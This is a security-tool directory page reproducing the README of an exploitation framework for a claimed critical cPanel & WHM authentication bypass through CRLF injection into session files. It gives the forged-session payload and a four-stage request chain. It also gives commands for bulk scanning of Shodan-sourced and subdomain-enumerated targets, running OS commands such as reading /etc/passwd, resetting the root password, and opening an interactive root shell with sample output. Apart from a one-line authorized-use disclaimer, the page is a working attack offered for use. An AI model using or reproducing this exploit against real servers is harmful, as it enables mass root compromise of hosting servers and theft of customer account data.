Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cPanelSniper β€” CVE-2026-41940 β€” cPanel & WHM Authentication Bypass via Session-File CRLF Injection | Kitploit
Tools/GitHubGitHub/zwanski2019/cpanelsniper
Authentication & AuthorizationVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubzwanski2019/cpanelsniper

cPanelSniper

335 months agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

CVE-2026-41940 β€” cPanel & WHM Authentication Bypass via Session-File CRLF Injection

View Repository

cPanelSniper

cPanelSniper

Python CVE cPanel stdlib pipeline Author

CVE-2026-41940 β€” cPanel & WHM Authentication Bypass via Session-File CRLF Injection
4-stage exploit chain Β· Interactive WHM Shell Β· Bulk scanner Β· Pipeline ready Β· stdlib only


Overview

cPanelSniper is a focused exploitation framework for CVE-2026-41940, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the Authorization HTTP header β€” without any valid credentials.

  • CVSS Score: 10.0 (Critical)
  • In-the-wild exploitation: Confirmed (April 2026)
  • Affected installs: ~70 million domains running cPanel & WHM
  • No dependencies: Pure Python stdlib β€” no pip, no requests, no external packages

For authorized penetration testing and bug bounty programs only.


How It Works

The root cause lives in Session.pm: the saveSession() function calls filter_sessiondata() after writing the session file to disk. This means CRLF characters embedded in the Authorization: Basic header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.

Normal flow:
  POST /login/ β†’ filter_sessiondata() β†’ write session β†’ auth check

Vulnerable flow:
  POST /login/ β†’ write session (CRLF payload injected) β†’ filter_sessiondata() β†’ auth check reads poisoned file

The CRLF Payload

The Authorization: Basic value decodes to:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.

4-Stage Exploit Chain

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Stage 0 β€” Canonical Hostname Discovery                     β”‚
β”‚  GET /openid_connect/cpanelid β†’ 307 β†’ real hostname         β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 1 β€” Mint Preauth Session                             β”‚
β”‚  POST /login/?login_only=1  (wrong creds)                   β”‚
β”‚  ← 401 + whostmgrsession cookie                             β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 2 β€” CRLF Injection                                   β”‚
β”‚  GET / + Cookie: session + Authorization: Basic <payload>   β”‚
β”‚  cpsrvd writes CRLF fields into session file                β”‚
β”‚  ← 307 Location: /cpsessXXXXXXXXXX/...                     β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 3 β€” Propagate (do_token_denied gadget)               β”‚
β”‚  GET /scripts2/listaccts                                    β”‚
│  Triggers raw→cache flush — injected fields become active   │
β”‚  ← 401 Token denied (expected)                              β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 4 β€” Verify WHM Root Access                           β”‚
β”‚  GET /cpsessXXXXXXXXXX/json-api/version                     β”‚
β”‚  ← 200 {"version":"11.x.x.x","result":1}  = PWNED          β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Affected Versions

BranchVulnerablePatched
110.x≀ 11.110.0.9611.110.0.97
118.x≀ 11.118.0.6211.118.0.63
126.x≀ 11.126.0.5311.126.0.54
132.x≀ 11.132.0.2811.132.0.29
134.x≀ 11.134.0.1911.134.0.20
136.x≀ 11.136.0.411.136.0.5

Installation

git clone https://github.com/ynsmroztas/cPanelSniper
cd cPanelSniper
python3 cPanelSniper.py --help

No pip install required. Pure Python 3.8+ stdlib only.


Usage

Basic Scan

# Single target β€” scan only
python3 cPanelSniper.py -u https://target.com:2087

# Single target β€” interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# Bulk scan from file
python3 cPanelSniper.py -l targets.txt -t 20 -o results.json

# Force scan (skip cPanel detection)
python3 cPanelSniper.py -u https://target.com:2087 --force

Post-Exploit Actions

# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list

# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version

# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell

Pipelines

# subfinder β†’ httpx β†’ cPanelSniper
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 | \
  python3 cPanelSniper.py -t 30 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2087,2086 -threads 100 | \
  python3 cPanelSniper.py -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python3 cPanelSniper.py -t 30 -o shodan_results.json

# stdin pipe
echo "https://target.com:2087" | python3 cPanelSniper.py

# Multiple sources combined
{ subfinder -d target.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python3 cPanelSniper.py -t 20 --action list

Interactive WHM Shell

After a successful bypass, the --action shell flag drops into an interactive prompt:

════════════════════════════════════════════════════════════
  WHM Shell β€” target.com
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

[email protected] β–Ά id
  uid=0(root) gid=0(root) groups=0(root)

[email protected] β–Ά accounts
  [cPanel Accounts]  target.com:2087 (47 users)
    user01               domain: example.com    email: [email protected]
    user02               domain: shop.com       email: [email protected]
    ...

[email protected] β–Ά cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...

[email protected] β–Ά info
  [Server Info]  https://target.com:2087
  hostname: srv01.target.com
  load: 0.72 / 0.66 / 0.69
  version: 11.130.0.6
Download Tool